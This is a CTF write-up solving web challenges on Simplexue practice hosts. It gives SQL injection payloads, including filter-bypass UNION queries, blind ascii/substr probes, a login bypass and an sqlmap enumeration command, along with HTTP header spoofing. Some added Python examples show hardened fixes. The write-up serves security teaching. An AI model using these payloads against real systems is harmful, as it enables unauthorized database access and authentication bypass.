
WEB CTF: Simplexue Academy (西普学院)

2015-11-26 11:49

1. Chrysanthemum (菊花)

                         http://ctf1.simplexue.com/web/6/  

Hint:

Please make sure you have installed .net framework 9.9!    

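Intercept the request with Burp and change the User-Agent to Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9). All of the injections below are sent with this header in place.

id=1 returns: hacker:welcome to simplexue CTF

id=4 returns: hacker: don’t try again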

id=0/**/ununionion/**/seselectlect/**/1,user(),database()


User name and database name: root@cuit-092a2b258a and inject

id=0/**/ununionion/**/seselectlect/**/1,username,userpapassss/**/ffromrom/**/aadmindmin/**/limit/**/0,1--
simplexue: flag is SimCTF{xuectf}                                 

2.Forbidden

                          http://ctf1.simplexue.com/basic/header/
Hint:

You don't have permission to access /on this server.

Make sure you are in HongKong
Intercept with Burp and change the header to Accept-Language:zh-hk, which returns => KEY:123JustUserAGent

3. The head is a bit big (头有点大)

                     http://ctf1.simplexue.com/web/1/index.asp?id=1

Hint:

You don't have permission to access / on this server.

Make sure you are in the region of England and browsing this site with Internet Explorer

Intercept with Burp and set these two headers:

User-Agent: Mozilla/5.0 (MSIE 9.0;.NET CLR 9.9)

Accept-Language:en-gb

The key is:HTTpH34der

4. Please enter the password (请输入密码)

             http://ctf1.simplexue.com/basic/js/index.asp

Intercept with Burp; the response contains this JavaScript:

<script type="text/javascript">
    document.oncontextmenu=function(){return false};
    var a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    a = Math.floor(a);
    function check(){
        if(document.getElementById("txt").value==a){
            return true;
        }else{
            alert("密码错误");
            return false;
        }
    }
</script>

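Compute the value with a C program:

#include<stdio.h>

/* Replays the arithmetic from the page's script. The script then applies
   Math.floor() to the result and compares it with the submitted password.
   float is used here while JavaScript numbers are doubles, so the digits
   after the decimal point differ from the browser's value; the integer
   part is the same. */
int main()
{
    float a,b,c,d,e,f,g;
    a = 3.14;
    b = a * 2;
    c = a + b;
    d = c / b + a;
    e = c - d * b + a;
    f = e + d /c -b * a;
    g = f * e - d + c * b + a;
    a = g * g;
    printf("%f",a);
    return 0;
}

Result: 424178.562500. Entering 424178 pops up key=>  @#$JSisagoodtool@#$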

5. This one looks rather simple (这个看起来有点简单)

              http://ctf5.simplexue.com/8/index.php?id=1
id=1'

id=1 and 1=1

id=1 and 1=2                          confirms SQL injection

id=1 order by 2                       two columns

id=1 union select 1,2                 column 2 is echoed

version():                                5.0.45-community-nt

database():                             my_db

user():                                    phpsql@localhost

Enumerate the databases:

 and 1=2 union select 1,schema_name  from information_schema.schemata limit 0,1

                 information_schema     my_db

Enumerate the tables:

and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,1

                           news           thiskey

Enumerate the columns:

and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,1

                                id        content           k0y

Dump the contents:

and 1=2 union select 1,k0y from thiskey

key=>           whati0MyD9ldump

6. Cat catches mouse (猫抓老鼠)

          http://ctf1.simplexue.com/basic/catch/          

Inspecting the HTTP response shows the header Content-Row: MTQ0ODU0MzEyNA==. Enter MTQ0ODU0MzEyNA== as the input         =>KEY: #WWWnsf0cus_NET#

7. The programmer's problem (程序员的问题)

                        http://ctf1.simplexue.com/web/4/index.php

View the source code:

<?php

if($_POST[user] && $_POST[pass]) {
$conn = mysql_connect("*******", "****", "****");
mysql_select_db("****") or die("Could not select database");
if ($conn->connect_error) {
die("Connection failed: " . mysql_error($conn));
}
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select user from php where (user='$user') and (pw='$pass')";
$query = mysql_query($sql);
if (!$query) {
printf("Error: %s\n", mysql_error($conn));
exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
if($row['user']=="admin") {
echo "<p>Logged in! Key: *********** </p>";
}

if($row['user'] != "admin") {
echo("<p>You are not admin!</p>");
}
}

?>

Entering admin returns You are not admin!, which suggests closing the quote and the parenthesis. Entering   ')or 1=1#   returns Key: WWW_SIMPLEXUE_COM
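The query from the source above, rebuilt as an added example (not part of the original write-up or the challenge code) to show what the interpolated string becomes and how bound parameters treat the same input. The function names, the sample row and the use of sqlite3 in place of MySQL are assumptions made for the demonstration.

```python
import hashlib
import sqlite3

PAYLOAD = "')or 1=1#"  # the user name submitted in the write-up

def md5_hex(text: str) -> str:
    # MD5 only mirrors the challenge's pw column; it is not a password hash to copy.
    return hashlib.md5(text.encode()).hexdigest()

def build_query(user: str, password: str) -> str:
    """Vulnerable form: the same string interpolation as the PHP source."""
    return f"select user from php where (user='{user}') and (pw='{md5_hex(password)}')"

def effective_sql(query: str) -> str:
    """What MySQL parses once '#' starts a comment (simplified: assumes the
    '#' is outside a string literal, which holds for this payload)."""
    return query.split("#", 1)[0]

def make_db() -> sqlite3.Connection:
    """Constructed sample table; sqlite3 stands in for the MySQL backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table php (user text, pw text)")
    conn.execute("insert into php values (?, ?)",
                 ("admin", md5_hex("constructed-secret")))
    return conn

def login_parameterized(conn: sqlite3.Connection, user: str, password: str):
    """Hardened form: values are bound as data and never parsed as SQL."""
    row = conn.execute("select user from php where user = ? and pw = ?",
                       (user, md5_hex(password))).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    print(effective_sql(build_query(PAYLOAD, "x")))
    db = make_db()
    print(login_parameterized(db, PAYLOAD, "x"))
    print(login_parameterized(db, "admin", "constructed-secret"))
```

The password comparison disappears from the parsed statement in the interpolated form, while the bound form matches the payload against the user column as a literal string and finds no row.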

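8. what a fuck! What the hell is this? (这是什么鬼东西?)

                            http://ctf5.simplexue.com/DUTCTF/1.html

A bit dizzying. It looks like JS encoding, so copy it out, wrap it in <script> </script> and run it: an alert pops up with  Ihatejs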

9. Seems a bit hard (貌似有点难)

                         http://ctf8.simplexue.com/phpaudit/
<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
    $cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
    $cip = $_SERVER["REMOTE_ADDR"];
else
    $cip = "0.0.0.0";
return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>

HTTP protocol:

Intercept with Burp and add the header   X-Forwarded-For: 1.1.1.1   to spoof the IP as   1.1.1.1            => Key is http_client
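A Python port of the GetIP() logic above next to a version that only honours X-Forwarded-For when the TCP peer is a known proxy. This is an added example, not code from the challenge; the proxy address 10.0.0.5, the sample addresses and the function names are assumptions.

```python
import ipaddress

# Assumption for this example: the only reverse proxy we operate is 10.0.0.5.
TRUSTED_PROXIES = {ipaddress.ip_address("10.0.0.5")}

def get_ip_vulnerable(headers: dict, remote_addr: str) -> str:
    """Port of the page's GetIP(): client-supplied headers take priority."""
    return (headers.get("Client-IP")
            or headers.get("X-Forwarded-For")
            or remote_addr
            or "0.0.0.0")

def get_ip_hardened(headers: dict, remote_addr: str) -> str:
    """Use the TCP peer address unless that peer is a proxy we operate."""
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES:
        return str(peer)  # direct connection: headers are ignored
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")
            if h.strip()]
    # Walk right to left: the entry our proxy appended is the last one, and
    # anything further left was supplied by the client and proves nothing.
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed chain: fall back to the peer
        if addr not in TRUSTED_PROXIES:
            return str(addr)
    return str(peer)

if __name__ == "__main__":
    forged = {"X-Forwarded-For": "1.1.1.1"}  # the header from the write-up
    print(get_ip_vulnerable(forged, "203.0.113.7"))
    print(get_ip_hardened(forged, "203.0.113.7"))
    print(get_ip_hardened({"X-Forwarded-For": "1.1.1.1, 203.0.113.7"}, "10.0.0.5"))
```

Even with the hardened lookup, a source address is a weak gate for releasing a secret; it belongs alongside authentication, not in place of it.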

10. Come in and get what you want (进来就给你想要的)

                     http://ctf1.simplexue.com/web/1/index.asp?id=1

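This challenge is about finding the admin back end:

Entering admin and viewing the page source shows the hint => 呵呵,思路是对的哈,但是不在这儿。想想谁的权利最大 (Heh, the idea is right, but it is not here. Think about who has the most power.)

Entering system     =>KEY: "!!!WellDoneBrother!"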

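11. Looks a bit hard (看起来有点难)

                  http://ctf1.simplexue.com/basic/inject/

This is a blind SQL injection challenge.

Enter the user name admin with any password, then submit.

Response: 登录失败,错误的用户名和密码 (login failed, wrong user name or password)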

Then proceed like this:

     http://ctf1.simplexue.com/basic/inject/index.php?admin=admin'and (ascii(substr(database(),1,1))=97) %23&pass=admin&action=login

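Note:

ascii(str) returns the ASCII code of the first character of the string; substr(str,start,length)/substring(str,start,length) extracts a substring (str is the string, start is the starting position, length is the number of characters).

This yields the database name: test

Then replace database() with other expressions to obtain the rest of the data.

Note: this challenge filters select; use selselectect instead.

With sqlmap: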

    sqlmap.py -u "http://ctf1.simplexue.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --data "admin=&pass="  -D test --tables
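Challenge 1 (ununionion, seselectlect) and challenge 11 (selselectect) both rely on a filter that deletes keywords in a single pass. The added example below, which is not code from either challenge, models such a filter and sets it beside strict validation of a numeric id; the keyword list is inferred from the doubled words in the payloads above and the function names are assumptions.

```python
import re

# Assumed blacklist, inferred from the doubled keywords in the payloads above.
BLACKLIST = ["union", "select", "from", "pass", "admin"]
_PATTERN = re.compile("|".join(BLACKLIST), re.IGNORECASE)

def strip_once(value: str) -> str:
    """Weak filter: delete each blacklisted keyword in one pass."""
    return _PATTERN.sub("", value)

def strip_until_stable(value: str) -> str:
    """Repeating the pass stops the nesting trick but still mangles data."""
    previous = None
    while previous != value:
        previous, value = value, _PATTERN.sub("", value)
    return value

def parse_id(value: str) -> int:
    """Hardened form for a numeric id: digits only, everything else rejected.
    The integer is then passed to the query as a bound parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", value):
        raise ValueError("id must be a positive integer")
    return int(value)

# Payload copied from challenge 1 on this page.
PAYLOAD = "0/**/ununionion/**/seselectlect/**/1,user(),database()"

if __name__ == "__main__":
    print(strip_once(PAYLOAD))           # keywords reassemble after one pass
    print(strip_until_stable(PAYLOAD))   # keywords gone, input still not an id
    print(strip_until_stable("administrator"))  # legitimate text is damaged
    try:
        parse_id(PAYLOAD)
    except ValueError as err:
        print("rejected:", err)
```

Deleting the inner match joins the text on either side of it back into the keyword, which is why the one-pass filter hands the database a working statement.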
